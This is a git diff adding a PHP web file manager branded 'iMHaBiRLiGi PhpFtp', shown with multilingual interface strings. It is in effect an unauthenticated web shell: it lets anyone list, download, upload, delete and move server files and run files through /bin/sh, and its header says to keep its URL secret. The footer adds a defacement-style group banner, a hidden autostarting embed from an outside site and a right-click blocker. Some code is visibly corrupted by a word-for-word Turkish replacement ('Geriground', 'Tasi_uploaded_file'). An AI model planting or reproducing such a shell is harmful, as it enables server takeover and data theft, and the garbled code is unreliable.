+'create_symlink' => 'Créer lien symbolique',
+'Sil' => 'Effacer',
+'Degistir' => 'Renommer',
+'Tasi' => 'Déplacer',
+'Kopyala' => 'Copier',
+'Düzenle' => 'Ouvrir',
+'indir' => 'Télécharger sur PC',
+'upload' => 'Télécharger sur serveur',
+'create' => 'Créer',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Exécuter',
+'reset' => 'Réinitialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'Geri' => 'Retour',
+'Yol' => 'Yol',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
+'already_exists' => '"[%1]" existe déjà.',
+'created' => '"[%1]" a été créé.',
+'not_created' => '"[%1]" n a pas pu être créé.',
+'really_Sil' => 'Effacer le fichier?',
+'Sild' => "Ces fichiers ont été détuits:\n[%1]",
+'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
+'Degistir_file' => 'Renomme fichier:',
+'Degistird' => '"[%1]" a été renommé en "[%2]".',
+'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
+'Tasi_files' => 'Déplacer ces fichiers:',
+'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
+'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
+'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
+'saved' => '"[%1]" a été sauvegardé.',
+'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
+'not_readable' => '"[%1]" ne peut pas être ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'Görevler' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'Sil' => 'cancella',
+'Degistir' => 'rinomina',
+'Tasi' => 'sposta',
+'Kopyala' => 'copia',
+'Düzenle' => 'modifica',
+'indir' => 'indir',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'Geri' => 'indietro',
+'Yol' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" è stato caricato.',
+'not_uploaded' => '"[%1]" non è stato caricato.',
+'already_exists' => '"[%1]" esiste già.',
+'created' => '"[%1]" è stato creato.',
+'not_created' => '"[%1]" non è stato creato.',
+'really_Sil' => 'Cancello questi file ?',
+'Sild' => "Questi file sono stati cancellati:\n[%1]",
+'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
+'Degistir_file' => 'File rinominato:',
+'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
+'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
+'Tasi_files' => 'Sposto questi file:',
+'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" non può essere modificato.',
+'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" è stato salvato.',
+'not_saved' => '"[%1]" non è stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non può essere letto.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'Säkerhetsnivå',
+'owner' => 'Ägare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'Görevler' => 'Funktioner',
+ 
+'read' => 'Läs',
+'write' => 'Skriv',
+'execute' => 'Utför',
+ 
+'create_symlink' => 'Skapa symlink',
+'Sil' => 'Radera',
+'Degistir' => 'Byt namn',
+'Tasi' => 'Flytta',
+'Kopyala' => 'Kopiera',
+'Düzenle' => 'Ändra',
+'indir' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => 'Ändra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'Töm',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'Geri' => 'Tillbaks',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Användare',
+'password' => 'Lösenord',
+'add' => 'Lägg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_Sil' => 'Radera dessa filer?',
+'Sild' => "De här filerna har raderats:\n[%1]",
+'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
+'Degistir_file' => 'Byt namn på fil:',
+'Degistird' => '"[%1]" har bytt namn till "[%2]".',
+'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
+'Tasi_files' => 'Flytta dessa filer:',
+'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" kan inte ändras.',
+'executed' => "\"[%1]\" har utförts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'Rättigheter för "[%1]":',
+'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte läsas.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Düzergah',
+'file' => 'Dosya',
+'filename' => 'DosyaAdi',
+
+'size' => 'Boyut',
+'permission' => 'izin',
+'owner' => 'Sahip',
+'group' => 'Grup',
+'other' => 'Diğerleri',
+'Görevler' => 'Görevler',
+
+'read' => 'Oku',
+'write' => 'Yaz',
+'execute' => 'Uygula',
+
+'create_symlink' => 'create symlink',
+'Sil' => 'Sil',
+'Degistir' => 'Degistir',
+'Tasi' => 'Tasi',
+'Kopyala' => 'Kopyala',
+'Düzenle' => 'Düzenle',
+'indir' => 'indir',
+'upload' => 'Yükle',
+'create' => 'Olustur',
+'change' => 'Degisiklik',
+'save' => 'Kaydet',
+'set' => 'Koyulan',
+'reset' => 'Yenile',
+'relative' => 'Hedefe Yolla',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'Geri' => 'Geri',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'Hiçbir çıktı',
+
+'user' => 'Kullanıcı',
+'password' => 'Sifre',
+'add' => 'Ekle',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" Yüklendi.',
+'not_uploaded' => '"[%1]" Yüklenemedi.',
+'already_exists' => '"[%1]" Şimdiden var ol.',
+'created' => '"[%1]" Olusturuldu.',
+'not_created' => '"[%1]" Olusturuldu.',
+'really_Sil' => 'Silinen dosyalar?',
+'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
+'not_Sild' => "Bu dosyalar olamazdı Sild:\n[%1]",
+'Degistir_file' => 'Dosyayi Degistir:',
+'Degistird' => '"[%1]" Degistirildi "[%2]".',
+'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
+'Tasi_files' => 'Dosyayi TAsi:',
+'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
+'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Bu Dosyalari Kopyala:',
+'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
+'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" Düzenle.',
+'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
+'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
+'saved' => '"[%1]" Kurtarildi.',
+'not_saved' => '"[%1]" Kurtarılamadı.',
+'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
+'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
+'permission_for' => 'izin "[%1]":',
+'permission_set' => 'izin "[%1]" Kopyalandi [%2].',
+'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].',
+'not_readable' => '"[%1]" Okunamadi.'
+		);
+
+	}
+
+}
+
+function getimage ($image) {
+	switch ($image) {
+	case 'file':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'folder':
+		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
+	case 'hidden_file':
+		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
+	case 'link':
+		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
+	case 'smiley':
+		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
+	case 'arrow':
+		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
+	}
+}
+
+function html_header () {
+	global $charset;
+
+	echo <<<END
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
+     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+
+<meta http-equiv="Content-Type" content="text/html; charset=$charset" />
+
+<title>iMHaBiRLiGi PhpFtp</title>
+
+<style type="text/css">
+body { font: small sans-serif; text-align: center }
+img { width: 0px; height: 0px }
+a, a:visited { text-decoration: none; color: red }
+hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
+#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
+#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt }
+.listing th, .listing td { padding: 1px 3pt 0 3pt }
+.listing th { border: 1px solid silver }
+.listing td { border: 1px solid #ddd; Geriground: white }
+.listing .checkbox { text-align: center }
+.listing .filename { text-align: left }
+.listing .size { text-align: right }
+.listing .permission_header { text-align: left }
+.listing .permission { font-family: monospace }
+.listing .owner { text-align: left }
+.listing .group { text-align: left }
+.listing .Görevler { text-align: left }
+.listing_footer td { Geriground: #eee; border: 1px solid silver }
+#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
+#directory { Geriground: #eee; border: 1px solid silver }
+#upload { padding-top: 1em }
+#create { padding-bottom: 1em }
+.small, .small option { font-size: x-small }
+textarea { border: none; Geriground: white }
+table.dialog { margin-left: auto; margin-right: auto }
+td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
+#permission { margin-left: auto; margin-right: auto }
+#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
+td.permission_action { text-align: right }
+#symlink { Geriground: #eee; border: 1px solid silver }
+#symlink td { text-align: left; padding: 3pt }
+#red_button { width: 120px; color: #400 }
+#green_button { width: 120px; color: #040 }
+#error td { Geriground: maroon; color: white; border: 1px solid silver }
+#notice td { Geriground: green; color: white; border: 1px solid silver }
+#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
+code { font-size: 12pt }
+td { white-space: nowrap }
+</style>
+
+<script type="text/javascript">
+<!--
+function activate (name) {
+	if (document && document.forms[0] && document.forms[0].elements['focus']) {
+		document.forms[0].elements['focus'].value = name;
+	}
+}
+//-->
+</script>
+
+</head>
+<body>
+
+
+END;
+
+}
+
+function html_footer () {
+
+	echo <<<END
+</body>
+</html>
+END;
+
+}
+
+function notice ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="notice">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+function error ($phrase) {
+	global $cols;
+
+	$args = func_get_args();
+	array_shift($args);
+
+	return '<tr id="error">
+	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
+</tr>
+';
+
+}
+
+?>
+<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 
+src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY>
+<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center>
+<FONT 
+class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true 
+type="text/plain; charset=iso-8859-9" 
+AUTOSTART="TRUE">
+<script language=JavaScript>
+<!--
+
+var message="";
+///////////////////////////////////
+function clickIE() {if (document.all) {(message);return false;}}
+function clickNS(e) {if 
+(document.layers||(document.getElementById&&!document.all)) {
+if (e.which==2||e.which==3) {(message);return false;}}}
+if (document.layers) 
+{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
+else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
+
+document.oncontextmenu=new Function("return false")
+// --> 
+</script>
\ No newline at end of file
diff --git a/php/iMHaPFtp.php b/php/iMHaPFtp.php
new file mode 100644
index 0000000..2c003b7
--- /dev/null
+++ b/php/iMHaPFtp.php
@@ -0,0 +1,2061 @@
+<?php
+/*
+ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
+ * Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
+ *
+ * Bu Kod Tamamiyle Özgür Yazilimdir.
+ * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
+ * Programin amaci ftp olmadan hostunuza baglanti kurup 
+ * Dosya ekleyip kaldira bilmektir.
+ * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
+ * -------------------------------------------------------------------------
+ * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
+ * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
+ * -------------------------------------------------------------------------
+ *
+ * iMHaBiRLiGi PhpFtp V1.1
+ * =========================================================================
+ *
+ * BeweiS
+ * <BeweiS@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * MicroP_
+ * <MicroP_@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * Libertical
+ * <libertical@imhabirligi.com>
+ *    iMHaBiRLiGi Yönetim
+ *    C++, Delphi,Programlama ve Linux Hastasi
+ *
+ * PowerGhost
+ * <powerghost@imhabirligi.com>
+ *    iMHaBiRLiGi Sistem Danismani
+ *    Sistem Danismani
+ *    
+ *  BadSector
+ *  ozgurkaleli@yahoo.com
+ *  iMHaBiRLiGi Yönetim
+ *   VicualBasic-Delphi Programlama
+ *   Sistemdanismani ve Linux Hastasi
+ *
+ * Bu kodun yaziliminda ismi gecen her arkadasimizin
+ * Katkilari bulunmustur.
+ * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
+ * Katkida bulunmuslardir.
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
+ * http://www.imhabirligi.com
+ *<iMHaBiRLiGi@imhabirligi.com>
+/* ------------------------------------------------------------------------- */
+
+/* Diller :
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'se' - Swedish
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of your filenames:
+ */
+$charset = 'ISO-8859-1';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the Düzenle textarea
+ */
+$Düzenlecols = 80;
+$Düzenlerows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (reTasi # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'indir':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'Sil':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Sild', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Sild', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_Sil') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Degistir':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (!@file_exists($dest) && @Degistir($file, $dest)) {
+			listing_page(notice('Degistird', $file, $dest));
+		} else {
+			listing_page(error('not_Degistird', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="Degistir" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('Degistir_file') . '</b>
+	<p>' . html($file) . '</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
+	<input type="submit" value="' . word('Degistir') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Tasi':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @Degistir($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Tasid', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Tasid', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('Tasi_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Tasi') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Kopyala':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
